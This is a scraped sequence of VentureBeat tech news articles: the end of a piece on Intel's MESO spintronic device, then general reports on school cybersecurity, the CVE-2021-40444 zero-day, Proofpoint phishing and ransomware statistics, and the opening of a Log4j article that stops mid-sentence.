decays exponentially. So when the transistor is turned off (reducing the voltage below the threshold), current will decrease exponentially as voltage is decreased. Crucially, the exact rate of this decay also depends on temperature. This property is known as the subthreshold slope, and it’s expressed in terms of how many millivolts are required to increase or decrease the current by 10x. (The exact limit is ~60mV/dec, as it turns out.) It’s this slope that determines the minimum operating voltage of a transistor. A transistor with a steeper slope would be able to operate at a lower voltage, which would reduce its power consumption and thus result in a higher energy efficiency and speed. But since this slope is purely determined by thermodynamics, the only way to make the slope steeper would be to decrease the temperature, which of course is unfeasible. This limitation is also known as the Boltzmann tyranny. Because the switching characteristics of a conventional CMOS device are determined (and limited) by fundamental physics, the only way to possibly circumvent this barrier is to look for devices that operate based on different physical mechanisms. This is where the appeal for beyond-CMOS devices comes from. Although a large amount of alternatives to the conventional transistor have been proposed, decades of R&D in silicon have made silicon a tough material to beat. In a landmark research paper in 2017, Intel benchmarked about two dozen beyond-CMOS devices. As can be seen from the summary graph, hardly any device is faster than HP CMOS, and just a few are lower power than LP CMOS. But overall, there didn’t seem to be any one candidate that is both faster and at a lower power. Without substantial improvements over CMOS, it is doubtful that it would be worthwhile to spend billions of dollars of R&D to make such a new switch suitable for high-volume manufacturing, as other issues such as cost might also come into play. So given the versatility of CMOS and regular semiconductors from low power to high performance, and from analog to RF to high voltage to digital, it is unlikely that current CMOS technology will ever be fully replaced. Rather, a new technology would perhaps be integrated in combination with CMOS so that it could be used only for the circuits in a system where it delivers a real benefit. How MESO goes beyond CMOS More recently, a new kind of device (MESO) has emerged, invented by Intel and proposed in a 2018 paper. Intel claimed it has the potential to deliver substantial benefits compared to CMOS. Since it would operate at just 100mV, it could result in 10 to 30 times higher efficiency. Intel further claimed it could improve logic density by 5x. The MESO device is also non-volatile (which means its state is conserved when power is turned off) and has spintronic properties, which means new kinds of circuits could be implemented, suitable for AI. “MESO is like a transistor – input voltage controls the current at the output (so it is electrical voltage in and current out like MOSFETs, but it switches at [approximately] 10x lower voltage than a MOSFET,” according to Intel. “Thus, wires only have top swing 10X lower voltage – this saves power.” However, while similar to a transistor, the architecture and physics of the MESO transistor completely differs from conventional semiconductors, as it makes heavy use of quantum effects and materials. Referring to the beyond-CMOS classification above, MESO makes use of no less than three classes of information carriers: electronics, magneto-electronics, and spintronics. However, perhaps the most elegant aspect about MESO is that all complexity is restricted to the device itself: Information comes into the device through a conventional charge-based interconnect, and at the end leaves the device again as an electrical current. In the device itself, the charge is first converted to magnetism using the magneto-electric effect, and then converted back to charge using the spin-orbit effect. The device and information flow is shown in the image below. In more detail, the device architecture works as follows. The input is a ferroelectric capacitor that is connected to a regular charge-based interconnect. Ferroelectric materials are materials whose magnetic properties can be controlled through currents, which explains how charge is converted to magnetism. (Analogously, in an electric motor, ferroelectric materials can be used to convert current into motion through magnetism.) This ferroelectric material in turn controls a nanomagnet or ferromagnet, which will point north or south depending on its input. Although this nanomagnet represents the output state of the transistor, it still has to be converted back to a current. This is achieved through a quantum effect called a spin-orbit interaction, or, more specifically, the inverse Rashba-Edelstein effect. In general, a spin-orbit interaction refers to the interaction of an electron with a magnetic field (recall from quantum physics that an electron has an intrinsic magnetic moment called its spin). A more technical description is that it is “a relativistic interaction of a particle’s spin with its motion inside a potential”. The Rashba-Edelstein effect is a mechanism to convert charge to spin, so the inverse effect accomplishes the desired conversion from spin to charge. As a current (Isupply in the image above) is sent through the nanomagnet, due to the inverse Rashba-Edelstein effect, the output will be a positive or negative current depending on the direction of the nanomagnet. The switching property is obtained since the nanomagnet has a thresholding property: an input voltage controls the nanomagnet (through the ferroelectric material), which will point either north or south, which will then result in either a positive or a negative output current. To make circuits with these devices then simply becomes a matter of connecting the output of one device to the input of the next device. For example, a positive output current in the first device would charge the ferroelectric input capacitor of the second device, while a negative current would discharge it. Interestingly, the thresholding property can also be used to build “majority gates” by using multiple voltages as input. As the name implies, a majority gate will output a 1 if the majority of its inputs is a 1. This is likely why Intel claimed the 5x density improvement: from the study of the broader field of spintronics it has been known already that circuits built using majority gates could be much smaller (require much less transistors) than conventional CMOS circuits. In summary, the input charge is converted to a magnetic “signal” through the ferroelectric material, which controls a nanomagnet. This nanomagnet in turn will determine the output charge based on a quantum effect that converts spin (induced by the nanomagnet) into charge. In the analogy with an electric motor, it is as if the input current controls the electric motor, which is at the same is used as an electric generator to convert the motion back into electricity (like in a wind turbine). The room temperature quantum materials, which Intel highlighted in 2018 as the main hurdles toward the physical realization of this device, are “correlated oxides” and “topological states of matter.” In the broader context of beyond-CMOS devices, since traditional electronics are based on charge instead of spin/magnetism, MESO solves the fundamental problem of the readout of the device due to conversion back to charge at the output. From the 2018 paper: “The discovery of strong spin –charge coupling in topological matter via a Rashba–Edelstein or topological two-dimensional electron gas enables this proposal for a charge-driven, scalable logic computing device.” For comparison, in traditional spintronics, the spin for example decays exponentially through an interconnect. In more technical terms, the use of spin for the transistor is referred to as a “collective state switch” whose output is dependent on a “collective order parameter” that can have two values (plus or minus theta), which in practice just refers to the spin being up or down. Since there are two possible outputs, this is indeed a switch, but the different mechanism (based on the order parameter) that it used overcomes the Boltzmann tyranny that plagues traditional electronics. The graph above shows Intel’s benchmark results (based on simulation) from 2018 for a 32-bit ALU. MESO achieved higher throughput density (TOPS per cm2) at a much lower power density than both CMOS HP and LV. Besides the lower operating voltage, Intel indicated that the different transistor architecture also allows for improvements in the interconnect, with resistance and capacitance requirements that are up to 100x “less stringent than conventional interconnects,” which in turn would reduce interconnect power by 10x. This might also contribute to MESO’s efficiency, since interconnects in modern chips could consume over 50% of the total power. Furthermore, Intel has demonstrated that the MESO device characteristics improve as the device is scaled further down (following a cubic trend), and MESO also promises integration and compatibility with CMOS. Intel’s original paper included various target specifications to reach a 1aJ/bit device. Intel claims this is 30x lower than CMOS, which seems in the ballpark given that another source provides a lower limit of ~144aJ/bit in older 45nm process technology. Although 1aJ/bit was provided as the target, further in the paper estimates from 0.1 to 10 aJ/bit were also mentioned. How these device specifications would translate into chip-scale specifications with circuits running at perhaps GHz-scale frequencies (if that is even feasible with MESO) still remains to be seen. For comparison , state of the art commercial NPUs (neural processing units) achieve up to 10 TOPS/W at INT8 precision, which translates into 100 fJ/instruction or roughly 10 fJ/bit. This implies the circuit level is ~100x less efficient than a single inverter at its most efficient voltage-frequency operating point. Applications in AI In an interview with VentureBeat in 2019, Intel identified AI, in particular, as a promising application for the MESO device, rather than CPUs. This is based on a few reasons. First, given the low operating voltage of the MESO device, it may not match the high frequencies of CMOS circuits. Rather, MESO might be most suitable for applications such as AI and graphics that rely on highly parallel operations that individually run at a lower speed than a CPU. Secondly, AI can make use of the different switching properties of MESO. Deep learning, in particular, is suited to the majority gates that can be made with MESO. So by designing circuits to take advantage of majority gates, neural networks could be implemented with much less transistors: “Majority gates is the next door neighbor to the neuron. Deep neural networks is about neurons and weights. We’ve found that this MESO technology and things that can do majority gates is very attractive in AI,” Intel said. “With the MESO magnet, multiple inputs can be brought in through a ‘majority gate,’ or thresholding gate. This is analogous to how neural networks use weights to represent the influence of nodes.” There could also be a more practical reason: “CPUs, which are the most commonplace when you’re building silicon, are oddly enough the hardest thing to build,” Amir Khosrowshahi, VP of Intel, said in the interview with VentureBeat. “But in AI, it’s a simpler architecture. AI has regular patterns, it’s mostly compute and interconnect, and memories. Also, neural networks are very tolerant to inhomogeneities in the substrate itself. So I feel this type of technology will be adopted sooner than expected in the AI space. By 2025, it’s going to be the biggest thing.” Timeline for MESO As for the commercialization of MESO, the 2025 timeline might be ambitious given how many challenges are involved with bringing a fundamentally new technology into production. For example, even improvements to standard transistors have often taken over a decade to go into production. Based on the discussion above, there are two options. Either MESO could represent an alternative manufacturing technology that would be used alongside conventional CMOS circuits, or it could be targeted to succeed CMOS altogether, just like how the FinFET completely replaced the conventional planar transistor at the leading edge. Notably, a key reason for MESO to usurp CMOS is its substantial uptick in power efficiency, according to Intel. Because MESO requires MOSFETs for clocking and power gating of its driving current, it doesn’t need a DC current to operate. Therefore, with a lower power voltage, MESO will have a lower power dissipation when compared to CMOS, Intel claims. In the former case, Intel could for example make chiplets using MESO transistors that would be attached to regular CMOS chiplets. This would be similar to how Intel also has distinct fabs for silicon photonics (which uses older process technology) or its 3D XPoint memory. In the latter case, Intel already laid out its multi-year roadmap earlier this year, making it unlikely MESO will be commercialized this decade. According to this roadmap, Intel would introduce the 18A node in 2025, which would be the first to use the next-gen (over $300 million) high-NA EUV lithography tool from ASML. It would be the successor of 20A, where Intel plans to introduce the RibbonFET and PowerVia. RibbonFET represents the biggest change to the transistor since the 3D FinFET in 2012, but it would still be more of an evolutionary change. RibbonFET extends the FinFET by wrapping the gate fully around the transistor, instead of just three sides with a fin. In addition, multiple ribbons (which together form one transistor) can be stacked vertically, reducing the area per transistor (and thus advancing Moore’s Law). Secondly, PowerVia represents Intel’s implementation of a backside power delivery network. This means the power delivery of the transistor would occur from below the chip, while the regular interconnections between transistors would remain above the transistors. So if the length that the FinFET has been in use is any indication, Intel would most likely further develop the RibbonFET for several more generations before it might become required to introduce a new technology in order to keep up with Moore’s Law. For example, Intel has already demonstrated stacking both the PMOS and NMOS RibbonFETs on top of each other. This by itself could nearly double transistor density. With MESO’s current iteration, however, it appears that Intel intends for MESO and CMOS to “coexist on the same chip.” In this complementary relationship, MESO is meant to oversee and improve the efficiency of energy-demanding workloads, whereas CMOS would focus on bolstering operations that require high speed, such as clocking and analog circuits. As of now, “MESO is an add-on to a CMOS process flow and is not included in the definition of a standard CMOS generation,” Intel said. “It can be added to any CMOS generation and provide a scalable energy efficiency improvement.” First experimental realization At IEDM 2021, in collaboration with several academia, Intel presented the first experimental realization of the MESO device, which brings it one step closer to commercialization. It also provides some more insight into the materials that were used. As input, the magneto-electric layer consists of bismuth ferrite (BiFeO3), which is a perovskite oxide. The magnet is a “nanostructured CoFe element,” and the output is a Pt element. The biggest challenge to make the MESO device a reality has been the conversion back to charge. In order for the circuit to work, the readout has to operate at the same voltage as the write operation. However, as detailed in a 2020 paper, the readout only worked at 10nV, but had since been improved to 100uV. In the future, Intel intends to continue improving upon this voltage readout. At IEDM, the company claimed that it had found a tentative means to achieve “100mV input voltage switching (with thinner multiferric oxide BiFeO3 and its doping) and 100mV output voltage driving of capacitive load (with better quantum materials such as topological materials, 2D electron gases, and functional oxides).” “Further scaling of the MESO device to 10s of nanometers and fabrication of circuits with MESO will then follow,” Intel said. Other developments IEDM as a research-oriented engineering conference gives a glimpse of the future, and Intel presented several more papers. The most significant one, besides MESO, was about a chip packaging technology called hybrid bonding: Intel has already announced it would use this technology going forward and called it Foveros Direct. Foveros is the name of Intel’s family of 3D packaging technologies. Intel’s regular Foveros uses copper bumps with pitches of 35-45um. By contrast, hybrid bonding shrinks this down to 10um, and below. For example, TSMC has also developed hybrid bonding (and will be used in upcoming AMD CPUs), and has suggested it could continue to shrink further for the next decades. The benefit is a higher density of interconnections. Moving beyond CMOS In nanotechnology, there are two approaches to improve electronics. First, most R&D goes into developing the next generations of conventional electronics, which results in incremental improvements to continue Moore’s Law. Since Moore’s Law is an exponential trend, this has been successful. But alternatively, researchers have and are also investigating a wide array of so-called beyond-CMOS devices with different properties, based on other physical mechanisms. The primary reason to consider these alternative device architectures is to circumvent the “Boltzmann tyranny” that bottlenecks classical electronics, in order to drastically improve energy efficiency of computing. In the last few years, MESO has become a frontrunner in this research. Its appeal arises from its architecture that uses a traditional electronic input and output, but with a conversion to magnetism, and then back to charge, that takes place in the device itself. Furthermore, as a spintronic device, MESO can be used to build majority gates. This could make it especially suitable for applications in AI, since fewer transistors would be required to create such circuits compared to standard CMOS. Combined with its low operating voltage of potentially just 100mV, MESO could deliver a step-size improvement in energy efficiency. To that end, Intel’s recent demonstration of the first experimental realization of this device shows that it continues to make progress to turn this into a technology that might one day replace, or at least augment, CMOS as the state-of-the-art of process technology. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,091
2,021
"Cybercriminals go back to school too | VentureBeat"
"https://venturebeat.com/2021/09/01/cybercriminals-go-back-to-school-too"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Cybercriminals go back to school too Share on Facebook Share on X Share on LinkedIn Kids in a classroom Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. This article was written by Amber Bennoui, senior technical product manager, Threat Stack. As K-12 and college students prepare to enter another academic year this fall, cybersecurity leaders are issuing stern warnings to educational institutions, as cyberattacks pose an increasing risk. The start of the school year represents a ripe opportunity for cybercriminals to exploit faculty, administrators, and students while they settle into their new schedules and routines. To add more confusion, K-12 schools and higher educational institutions are still in the early stages of their digital transformations — undertaking efforts to scale infrastructure to support a growing need for remote learning, migrating to cloud infrastructure, and introducing new technologies and frameworks. IT leaders at schools and universities must proactively manage their digital transformations by balancing the cybersecurity and compliance needs of their modern IT infrastructure as user adoption grows. Ignore one, and the rest suffer. Education’s transformation into a highly regulated industry When thinking about highly regulated industries, K-12 and higher education do not initially come to mind. However, given the volume of sensitive information (i.e., student financial records and PII), we are seeing educational institutions forced to comply with frameworks outside of the US Department of Education’s Family Educational Rights and Privacy Act (FERPA). Education institutions’ cloud posture introduces new complexities and compliance requirements, including, but not limited to HIPAA, PCI DSS, SOC, GDPR, and state-mandated privacy requirements. Just as compliance has become the standard for doing business in the private sector, it has also become inherently critical for publicly facing entities like hospitals and schools to keep patient and student personal data secure. Regulators have imposed a wide array of mandates and protections designed to uphold privacy and security standards around consumer information. Educational institutions must have visibility into how data flows into and out of their IT environment. Schools now must identify the local, global, and industry regulations that apply to their business and strategically implement the processes and technologies that keep them compliant. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Many certifications require a host of documentation, including a clear information security policy, a risk assessment process, security assessments for any third-party tooling, and evidence of information security monitoring and detection. It’s also critical that organizations stay current with changes to compliance frameworks. Security tooling should map specific behaviors to multiple frameworks and, ideally, identify abnormal or anomalous behavior to proactively identify potential threats and save a lot of time and manual labor. Bonus points if you can produce reports to provide proof of compliance while responding to audit requests. The good news is that many of these regulations overlap so that educational institutions can simultaneously complete requirements for multiple compliance frameworks. Compliance also has the ancillary benefit of improving security maturity, a critical facet of educational institutions’ operations given that Microsoft Security Intelligence found that 61% of nearly 7.7 million enterprise malware encounters reported in the past month came from those in the education sector. Cybercriminals taking educational institutions to school The education sector is heavily under fire by opportunistic cybercriminals. Security vendor PurpleSec found that education was ranked last in cybersecurity preparedness out of 17 major industries. That same report also identified close to 500 cybersecurity incidents involving education institutions in 2020 alone. The reason for cybercriminals’ heightened interest in the sector is simple: educational IT leaders often do not have the appropriate resources or budget to protect against cyberattacks. Therefore, they are considered soft targets by bad actors. This scenario is even more critical as schools rush to scale existing tools and implement new remote education tools to enable hybrid learning due to the ongoing Covid-19 pandemic. With an IT environment in transition, it is difficult for educational institutions to enforce data ownership security protocols while building redundancies, making them susceptible to DDoS attacks, SQL injection, phishing, ransomware, and password attacks. Recommendations for an A+ cybersecurity strategy Educational IT leaders must prevent, accurately identify, and quickly respond to risk across cloud infrastructure and applications. Full-stack observability is crucial in preventing and defusing cyberattacks before they become large-scale breaches. Collecting this data is difficult in the cloud, often rendering traditional collection approaches ineffective. The aforementioned is why many businesses use tooling and scripts backed by machine learning to collect and analyze telemetry based on pre-set rules and conditions. This option is attractive to academic institutions because it enables IT leaders to fortify and maintain their security posture without adding significant administrative work to their plates. Proactive monitoring allows schools to limit the scope and reach of common attack vectors. Educational institutions are undergoing a long-awaited technological revolution that will forever change their operations and introduce new efficiencies to the educational sector. However, despite all this change, it is essential for IT leaders not to lose sight of their compliance and cybersecurity responsibilities. Cybercriminals certainly are not. The first step in any compliance or cybersecurity program is simple: you have to know where and how sensitive information is stored within infrastructure, monitor network configuration on the entire network, log user privileges and access, and determine if data follows proper handling procedures. These basic tenets serve as a solid foundation for IT leaders to advance their educational institutions’ digital transformations. Amber Bennoui is a senior technical product manager at Threat Stack, a VC fellow at Vencapital, and former co-founder of an experimental open source, peer-to-peer teaching and learning platform, University of Reddit. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,092
2,021
"Report: Cybercriminals refine tactics to exploit zero-day vulnerabilities | VentureBeat"
"https://venturebeat.com/2021/10/17/report-cybercriminals-refine-tactics-to-exploit-zero-day-vulnerabilities"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Report: Cybercriminals refine tactics to exploit zero-day vulnerabilities Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. HP Wolf Security captured exploits of the zero-day CVE-2021-40444 — a remote code execution vulnerability in the MSHTML browser engine that can be triggered simply by opening a malicious Microsoft Office document — as early as September 8, a week before a patch was issued. The latest HP Wolf Security Threat Insights Report shows how cybercriminals continue to innovate in their tactics , techniques, and procedures, and how sophisticated threats like zero-day exploits are rapidly filtering down to less-capable attackers. Looking at the recent CVE-2021-40444 vulnerability, exploit generators emerged on public code-sharing websites days after the vulnerability bulletin was released. This exploit is ripe for abuse by attackers because they can gain control of a system simply by tricking a victim into previewing a malicious Office document in File Explorer. Because so little user interaction is required to exploit the vulnerability, victims are less likely to realize that their system has been compromised compared to other techniques, giving attackers a head start in achieving their objectives — whether it’s stealing data or holding a business to ransom. This particular exploit isn’t limited to the most advanced cybercriminals, either. Proof of concept scripts that allowed almost anyone to weaponize the exploit appeared four days before a patch was available for organizations to install. As many organizations will still be deploying the patch, HP expects to see this vulnerability exploited more over the coming months. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! One of the emerging malware trends between July and September is that cybercriminals are increasingly piggybacking off legitimate cloud services like OneDrive to host their malware. This allows them to slip past network security controls that rely on website reputation to protect users, such as web proxies. HP also saw an uptick in JavaScript and HTA (HTML Application) malware delivered as email attachments. These file formats have proven effective at evading detection, allowing attackers to reach employee inboxes. In fact, 12% of email malware isolated by HP Wolf Security in Q3 bypassed at least one email gateway scanner. To protect against zero-day exploits spread via malicious attachments, or stealthy threats that are slipping past detection tools, organizations need to make sure they are following zero trust principles — for example, by using threat isolation as part of a layered defense. This will protect the organization from the most common attack vectors like clicking on malicious links, attachments, and downloads, or visiting malicious web pages. Risky tasks are executed in disposable, isolated virtual machines, separated from the host operating system. If a user opens a malicious document, the malware is trapped — its operator has nowhere to go and nothing to steal. This renders malware harmless and helps keep organizations safe. Read the full report by HP. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,093
2,022
"22 very bad stats on the growth of phishing, ransomware | VentureBeat"
"https://venturebeat.com/security/22-very-bad-stats-on-the-growth-of-phishing-ransomware"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages 22 very bad stats on the growth of phishing, ransomware Share on Facebook Share on X Share on LinkedIn Are you looking to showcase your brand in front of the brightest minds of the gaming industry? Consider getting a custom GamesBeat sponsorship. Learn more. Email-based phishing attacks became a lot more successful in 2021 — and so did ransomware attacks, in terms of getting victims to pay the ransom demand, according to new stats from email security vendor Proofpoint. The vendor’s new report — the 2022 State of the Phish — provides insights into what’s been happening with phishing, the sneaky email-borne attacks that often serve as the starting point for a ransomware incident. The report has new details to add on ransomware, too. During 2021, “cybercriminals continued to target people, rather than infrastructure, with social engineering efforts,” said Adenike Cosgrove, cybersecurity strategist at Proofpoint, in an email to VentureBeat. And notably, “cybercriminals were not only more active in 2021 compared to 2020, they were also more successful,” Cosgrove said. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Worsening trends The report comes after a number of major cybersecurity firms have released data on just how bad things got last year when it came to cyberattacks. For instance, SonicWall reported that the total number of ransomware attacks more than doubled in 2021 — jumping 105% during the year compared to 2020. CrowdStrike, meanwhile, disclosed that data leaks related to ransomware surged 82% in 2021, while the average ransom demand grew 36% to $6.1 million. Today, it’s Proofpoint’s turn. The company’s findings are based on a survey of 600 security professionals and 3,500 workers in Australia, France, Germany, Japan, Spain, the United Kingdom and the U.S. — as well as data from simulated phishing attacks sent by Proofpoint and from customer reporting. Below are 22 statistics from the report that stand out to me as the most significant for businesses. The results of the survey on phishing and ransomware come as “employees are feeling burned out, emotionally drained and distracted,” Proofpoint says in the report. “Meanwhile, cyber attackers are as adept as ever. And they continue to use tactics and lures that resonate with employees and consumers alike.” What follows are 22 troubling stats on the growth of phishing and ransomware, via Proofpoint’s 2022 State of the Phish report. Phishing 1. Email-based phishing : 83% of organizations said they experienced a successful email-based phishing attack in 2021, versus 57% in 2020. That equates to a 46% increase in organizations hit with a successful phishing attack last year. 2. Bulk phishing : 86% of organizations faced bulk phishing attacks last year, up from 77% the year before. Bulk phishing is “indiscriminate, ‘commodity’ attacks in which the same email is sent to many people within an organization,” Proofpoint says. 3. BEC attacks : 77% of organizations faced business email compromise attacks in 2021, up from 65% in 2020. That represented an 18% increase in BEC attacks. 4. Spearphishing attacks : 79% of organizations saw spearfishing attacks — i.e., attacks targeting specific users — in 2021. That’s up from 66% the year before. “Whether it’s ransomware, business email compromise, or a variety of other threat types, email remains the No. 1 channel for cybercriminals to steal data and siphon billions each year,” Cosgrove said. “Over 90% of targeted attacks start with email, and nearly all rely on human interaction to work — making people the new enterprise perimeter to defend.” The focus on securing digital systems over the past several years means that attackers “have moved to combining social engineering lures via email with a variety of attack methods delivered via attachment or URL,” she said. “Many corporate users require email to do their job — and all it takes is one human to click a link in an office document that contains a malicious macro, and a downloader or other malware can be implanted on the target system.” Smishing/vishing/social 5. Smishing : 74% of organizations faced smishing attacks in 2021, versus 61% in 2020. Smishing refers to attacks that primarily use SMS text messages as the communication method. 6. Vishing : 69% of organizations faced vishing attacks — which use phone calls or voice messages — in 2021. That’s up from 54% in 2020. 7. Social attacks : 74% of organizations experienced attacks via social media in 2021, compared to 61% in 2020. These findings show that “while email remains a vector of choice for cybercriminals, they continue to use a multitude of methods to target employees,” Cosgrove said. In particular, attackers capitalized on global news cycles and trends “to gain traction with those they were targeting,” she said. As examples, Proofpoint researchers saw attackers using lures relating to new strains of COVID-19, the Netflix show “Squid Game,” popular social media profiles and movie streaming services. “Attackers are continually pivoting to using topics that will get the most clicks,” Cosgrove said. Successful phishing attacks Here are some of the consequences that organizations experienced in connection with successful phishing attacks (stats number 8-18 for this list): 54% experienced a breach of customer or client data 48% saw credential/account compromise 46% experienced ransomware infection 44% saw loss of data/intellectual property 27% were hit with malware other than ransomware 24% reported reputational damage 22% reported a widespread network outage/downtime 18% reported that an advanced persistent threat resulted 17% reported financial loss/wire transfer or invoice fraud 15% saw a zero day exploit 11% paid a financial penalty/regulatory fine Ransomware 19. Email-based ransomware : 78% of organizations experienced email-based ransomware attacks in 2021. (Proofpoint didn’t disclose a comparable statistic for 2020.) 20. Ransomware infections : 68% of organizations were infected by ransomware in 2021, up from 66% in 2020. Nearly two-thirds of those organizations were hit by three separate ransomware infections, while nearly 15% of those experienced more than 10 separate ransomware infections. 21. Ransom payments : 58% of organizations infected with ransomware agreed to pay a ransom in 2021 — well above the 34% that did so in 2020. Of those, 32% had to make an additional ransom payment to regain access to their data/systems. And 4% of those who paid never were able to get access to their data and systems. Awareness 22. When asked, “what is phishing?” — 53% of workers answered correctly in 2021, down from 63% the year before. The same question about smishing yielded correct answers 23% of the time (down from 31% in 2020), and vishing was answered correctly 24% of the time in 2021 (down from 30% the year before). U.S. findings In the U.S., Proofpoint data shows that workers are displaying behaviors in their day-to-day lives that could lead to attacks, Cosgrove said. Fifty-five percent of U.S. workers surveyed admitted to taking a risky action in 2021, including 26% that clicked an email link that led to a suspicious website, and 17% that accidentally compromised their credentials, she noted. Additionally, 49% believe that their organization will automatically block all suspicious or dangerous emails — “illustrating a disconnect in the responsibility employees have on the overall security posture of their organization,” Cosgrove said. However, the good news in the U.S. is that many organizations are tailoring their cybersecurity awareness training to keep pace with the threat landscape, according to Cosgrove. Sixty-seven percent of U.S. organizations are using phishing tests that mimic trending threats, compared to the global average of 53%, she said. “While attackers are increasingly active – and successful – in their attacks, organizations are taking steps in shoring up their cyber defenses and keeping their people at the heart of this,” Cosgrove said. Training ‘is working’ All 100% of U.S. organizations surveyed said they run a cybersecurity training program, and 64% say they assign cybersecurity training to all employees in the business, she said. And crucially, “this approach is working, with 84% of U.S. organizations saying security awareness training has reduced phishing failure rates, the highest of any country surveyed,” Cosgrove said. As another indicator, 40% of U.S. organizations reported a ransomware infection as a result of a successful phishing attack, less than the global average of 46%. And, 79% of survey respondents in the U.S. said their organization experienced at least one successful email-based phishing attack in 2021, compared to 74% in 2020. “While this is still an increase, it is less significant than what we saw across the global theater,” Cosgrove said. Ultimately, “multilayered protection is the best strategy against phishing emails, with the most important principle being the placement of people at the center of the security strategy,” she said. “It’s critical to understand which users are most targeted — which we refer to as very attacked people — and which of them are the likeliest to fall for the social engineering that phishing attacks rely on,” Cosgrove said. “Users are a critical line of defense against phishing — and its important security awareness education provides a foundation to ensure everyone can identify a phishing email and easily report it.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,094
2,021
"The Log4j vulnerability is bad. Here's the good news | VentureBeat"
"https://venturebeat.com/2021/12/10/the-log4j-vulnerability-is-bad-heres-the-good-news"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages The Log4j vulnerability is bad. Here’s the good news Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. A critical vulnerability discovered in Log4j, a widely deployed open source Apache logging library, is almost certain to be exploited by hackers — probably very soon. Security teams are working full-throttle to patch their systems, trying to prevent a calamity. (The massive 2017 privacy records breach of Equifax involved a similar vulnerability.) It’s a very bad day, and it could get much worse soon. But in some regards at least, businesses are in a better position to avoid a catastrophe now than in the past. This being 2021, there are some advantages now when it comes to responding to a zero-day bug of this severity, security executives and researchers told VentureBeat. First and foremost, “the world is primed for responding to these disclosures, with companies moving to mitigate issues within hours,” said Brian Fox, 